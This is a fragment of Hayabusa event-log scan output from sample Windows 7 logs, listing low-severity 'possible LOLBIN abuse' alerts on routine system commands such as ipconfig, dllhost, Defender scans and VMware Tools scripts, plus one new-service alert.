6852016-08-28 06:44:55.299 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6862016-08-28 06:44:55.315 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x298 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6872016-08-28 06:45:05.616 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" | Path: C:\Windows\System32\mmc.exe | PID: 0x6e0 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6882016-08-28 11:00:00.609 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" | Path: C:\Windows\System32\schtasks.exe | PID: 0xa7c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6892016-08-28 13:15:14.072 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe78 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6902016-08-28 13:15:14.084 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb08 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6912016-08-29 23:37:30.766 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART | Path: C:\Windows\System32\rundll32.exe | PID: 0xdcc | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6922016-08-29 23:37:30.851 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x778 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6932016-08-29 23:37:30.855 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xb18 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6942016-08-29 23:37:31.219 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" | Path: C:\Windows\System32\schtasks.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6952016-08-29 23:37:31.883 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6962016-08-29 23:37:31.960 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6bc | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6972016-08-29 23:54:31.771 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xebc | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6982016-08-29 23:54:31.785 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xaa0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6992016-08-29 23:54:31.794 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7002016-08-30 00:12:55.760 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7012016-08-30 00:19:56.352 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\IEUser\AppData\Local\Temp\pokby4eb.cmdline" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xbf0 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7022016-08-30 00:19:56.506 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\IEUser\AppData\Local\Temp\zfglcxyz.cmdline" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xdd4 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7032016-08-30 00:19:56.699 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\IEUser\AppData\Local\Temp\agq-0l0x.cmdline" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xdec | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7042016-08-30 00:19:56.794 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\IEUser\AppData\Local\Temp\h5llmxxc.cmdline" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xb80 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7052016-08-30 00:19:57.533 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\PING.EXE" "Local CMOS Clock" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xb18 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7062016-08-30 00:19:57.542 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\PING.EXE" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x1a4 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7072016-08-30 00:26:10.013 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7082016-08-30 00:26:10.074 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xaa0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7092016-08-30 03:52:07.690 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x704 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7102016-08-30 03:52:09.246 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcb0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7112016-08-30 03:55:06.593 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" | Path: C:\Windows\System32\schtasks.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7122016-08-30 03:55:10.198 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\eventvwr.exe" /l:"C:\Users\IEUser\Documents\security.evtx" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7132016-08-30 03:55:10.265 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /l:"C:\Users\IEUser\Documents\security.evtx" | Path: C:\Windows\System32\mmc.exe | PID: 0x458 | User: IEUser | LID: 0x4cfe1rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7142016-08-30 04:01:46.591 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb08 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7152016-08-30 05:07:27.112 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x41c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7162016-08-30 05:07:27.171 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x748 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7172016-08-30 06:32:15.294 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1110 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7182016-08-30 06:32:37.708 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7192016-08-30 06:33:45.868 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x770 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7202016-08-30 06:33:47.755 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x10e8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7212016-08-30 06:36:08.808 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1454 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7222016-08-30 06:36:32.722 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbdc | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7232016-08-30 10:44:32.448 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x17ac | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7242016-08-30 10:44:32.463 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x584 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7252016-08-30 18:48:21.079 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14fc | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7262016-08-30 18:48:21.686 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x10d4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7272016-08-30 18:48:21.710 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x15c0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7282016-08-30 18:48:40.739 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x87c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7292016-08-30 18:53:51.556 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\system32\wuauclt.exe" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7302016-08-30 20:00:00.584 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" | Path: C:\Windows\System32\schtasks.exe | PID: 0x12b0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7312016-08-30 21:12:52.789 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x103c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7322016-08-30 21:12:52.817 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x15b8 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7332016-08-30 21:12:52.880 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "c:\program files\windows defender\MpCmdRun.exe" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x730 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7342016-08-30 21:14:52.630 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x1790 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7352016-08-30 22:21:18.584 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17c4 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7362016-08-30 22:21:41.261 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x304 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7372016-08-30 22:22:15.298 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7382016-08-30 22:22:37.732 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1194 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7392016-08-30 23:36:31.003 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x1130 | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7402016-08-31 00:21:31.129 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: "C:\Windows\System32\msiexec.exe" /i "C:\Users\IEUser\Downloads\EMET Setup.msi" | Path: C:\Windows\System32\msiexec.exe | PID: 0xaf0 | User: IEUser | LID: 0x4d011rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7412016-08-31 00:21:31.333 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x11dc | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7422016-08-31 02:31:58.790 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x15c | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7432016-08-31 02:31:58.886 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcac | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
7442016-08-31 02:32:06.392 +09:00IE10Win77045infoNew Service InstalledName: Mozilla Maintenance Service | Path: "C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe" | Account: LocalSystem | Start Type: demand startrules/hayabusa/default/events/System/7045_NewServiceInstalled.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
7452016-08-31 02:32:07.392 +09:00IE10Win74688lowSuspicious Cmd Line_Possible LOLBIN AbuseCmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13ac | User: IE10WIN7$ | LID: 0x3e7rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
